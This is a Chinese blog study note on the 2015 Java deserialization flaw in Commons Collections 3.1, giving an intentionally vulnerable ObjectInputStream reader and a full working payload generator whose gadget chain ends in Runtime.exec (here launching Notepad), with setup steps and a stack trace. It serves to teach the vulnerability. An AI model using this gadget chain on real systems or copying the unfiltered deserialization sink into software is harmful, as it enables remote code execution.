Java反序列化漏洞学习笔记

作者: Luan 分类: 学习笔记 发布时间: 2017-06-05 11:54

15年的老漏洞,翻出来学习学习,TSRC的文章很详细。

我的测试环境是win10企业版+jdk1.7,使用的代码:
反序列化输入(文件)的代码(注意:下面两段代码都声明了 `public class test`,要分别放在不同的目录/工程里编译运行):

import java.io.File;
import java.io.FileInputStream;
import java.io.FileNotFoundException;
import java.io.IOException;
import java.io.ObjectInputStream;
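/**
 * Deliberately vulnerable deserialization sink for the demo: reads one object
 * from serial.bin through a plain ObjectInputStream with no restriction on the
 * classes the stream may resolve, so whatever gadget chain the file carries
 * runs inside readObject() -- before the cast below is ever reached.
 *
 * NEVER use this pattern on data an attacker can influence. Restrict the
 * classes that may be resolved (override resolveClass(), or install an
 * ObjectInputFilter on JDKs that ship one) before calling readObject().
 */
public class test {
	public static void main(String[] args) throws FileNotFoundException, IOException, ClassNotFoundException {
		// try-with-resources (Java 7+) closes the stream on every exit path,
		// including when readObject() throws; the original leaked the FileInputStream.
		try (ObjectInputStream ois = new ObjectInputStream(new FileInputStream(new File("serial.bin")))) {
			// The payload executes here, during readObject(). With the demo payload the
			// stream yields an AnnotationInvocationHandler, so the cast to String then
			// throws ClassCastException -- expected, and too late to stop the command.
			String test = (String) ois.readObject();
			System.out.println(test);
		}
	}
}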

生成Payload的代码:

import java.io.File;
import java.io.FileNotFoundException;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.lang.annotation.Retention;
import java.lang.reflect.Constructor;
import java.lang.reflect.InvocationTargetException;
import java.util.HashMap;
import java.util.Map;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.TransformedMap;
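/**
 * Builds the Commons-Collections 3.1 gadget chain (the TransformedMap /
 * AnnotationInvocationHandler shape) and serializes it to serial.bin.
 *
 * How it fires on the reading side: AnnotationInvocationHandler.readObject()
 * walks its memberValues map; because "lu4n.com" is a String rather than the
 * RetentionPolicy that Retention.value() expects, it calls setValue() on the
 * entry. The map is a TransformedMap, so setValue() runs the value transformer,
 * i.e. the chain below, which ends in Runtime.exec(String[]).
 *
 * Requires commons-collections 3.1 on the classpath. This program runs no
 * command itself; the command executes only when serial.bin is deserialized.
 */
public class test {
	public static void main(String[] args) throws ClassNotFoundException, NoSuchMethodException, SecurityException, InstantiationException, IllegalAccessException, IllegalArgumentException, InvocationTargetException, FileNotFoundException, IOException {
		// Command run by the victim; pre-split into argv so exec(String[]) receives it verbatim.
		String[] execArgs = "cmd /c notepad".split(" ");

		// Each InvokerTransformer calls a method by name on the previous step's output:
		//   Runtime.class -> getMethod("getRuntime") -> invoke(null) = Runtime instance -> exec(execArgs)
		// Everything is reached via Class/Method names because a Runtime instance cannot be serialized.
		Transformer[] transforms = new Transformer[]{
				new ConstantTransformer(Runtime.class),
				new InvokerTransformer(
						"getMethod",
						new Class[]{String.class, Class[].class},
						new Object[]{"getRuntime", new Class[0]}
				),
				new InvokerTransformer(
						"invoke",
						new Class[]{Object.class, Object[].class},
						new Object[]{null, new Object[0]}
				),
				new InvokerTransformer(
						"exec",
						new Class[]{String[].class},
						new Object[]{execArgs}
				)
		};
		Transformer transformerChain = new ChainedTransformer(transforms);

		// Key must be "value" (the only member of @Retention) so readObject() finds a
		// matching member; the value must NOT be a RetentionPolicy so the setValue() branch is taken.
		Map<String, Object> tempMap = new HashMap<String, Object>();
		tempMap.put("value", "lu4n.com");
		// No key transformer, value transformer = the chain. Do NOT put() into outputMap
		// here: TransformedMap transforms on put(), which would run the chain on this machine.
		Map<String, Object> outputMap = TransformedMap.decorate(tempMap, null, transformerChain);

		// Mixed-case spelling kept from the original; it resolves to
		// sun.reflect.annotation.AnnotationInvocationHandler, whose constructor is
		// package-private -- hence setAccessible(true).
		String classname = "SuN.ReFlEcT.AnnoTATIon.".toLowerCase() + "AnnotationInvocationHandler";
		Class<?> cls = Class.forName(classname);
		Constructor<?> ctor = cls.getDeclaredConstructor(Class.class, Map.class);
		ctor.setAccessible(true);
		Object instance = ctor.newInstance(Retention.class, outputMap);

		// try-with-resources closes (and so flushes) the stream; the original never closed
		// it, leaving buffered bytes at risk of never reaching serial.bin.
		try (ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream(new File("serial.bin")))) {
			oos.writeObject(instance);
		}
	}
}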

如果运行反序列化代码时出现下面的 ClassNotFoundException,说明 classpath 里没有 commons-collections(注意调用栈:类是在 AnnotationInvocationHandler.readObject 中、也就是 readObject() 内部被解析的,这正是 payload 触发的位置):

Exception in thread "main" java.lang.ClassNotFoundException: org.apache.commons.collections.map.TransformedMap
	at java.net.URLClassLoader$1.run(URLClassLoader.java:366)
	at java.net.URLClassLoader$1.run(URLClassLoader.java:355)
	at java.security.AccessController.doPrivileged(Native Method)
	at java.net.URLClassLoader.findClass(URLClassLoader.java:354)
	at java.lang.ClassLoader.loadClass(ClassLoader.java:425)
	at sun.misc.Launcher$AppClassLoader.loadClass(Launcher.java:308)
	at java.lang.ClassLoader.loadClass(ClassLoader.java:358)
	at java.lang.Class.forName0(Native Method)
	at java.lang.Class.forName(Class.java:278)
	at java.io.ObjectInputStream.resolveClass(ObjectInputStream.java:625)
	at java.io.ObjectInputStream.readNonProxyDesc(ObjectInputStream.java:1612)
	at java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:1517)
	at java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:1771)
	at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1350)
	at java.io.ObjectInputStream.defaultReadFields(ObjectInputStream.java:1990)
	at java.io.ObjectInputStream.defaultReadObject(ObjectInputStream.java:500)
	at sun.reflect.annotation.AnnotationInvocationHandler.readObject(AnnotationInvocationHandler.java:427)
	at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
	at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:57)
	at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
	at java.lang.reflect.Method.invoke(Method.java:606)
	at java.io.ObjectStreamClass.invokeReadObject(ObjectStreamClass.java:1017)
	at java.io.ObjectInputStream.readSerialData(ObjectInputStream.java:1893)
	at java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:1798)
	at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1350)
	at java.io.ObjectInputStream.readObject(ObjectInputStream.java:370)
	at test.main(test.java:9)

下载有漏洞的 org.apache.commons.collections-3.1,导入项目就可以了。(这里要用旧版本:后来的 commons-collections 版本默认拒绝反序列化这类 Transformer,同一份 payload 不会再生效。)

先运行生成 payload 的代码,生成 serial.bin,然后运行反序列化代码,正常情况就会弹出记事本。记事本是在 readObject() 执行过程中弹出的;随后 `(String)` 强制类型转换会抛出 ClassCastException,这是预期现象,不影响命令已经执行的事实。


2条评论
  • ddg

    2017年6月6日 上午8:56

    TSRC

    1. Luan

      2017年6月6日 上午9:05

      == 不小心打错了,已纠正,三克油
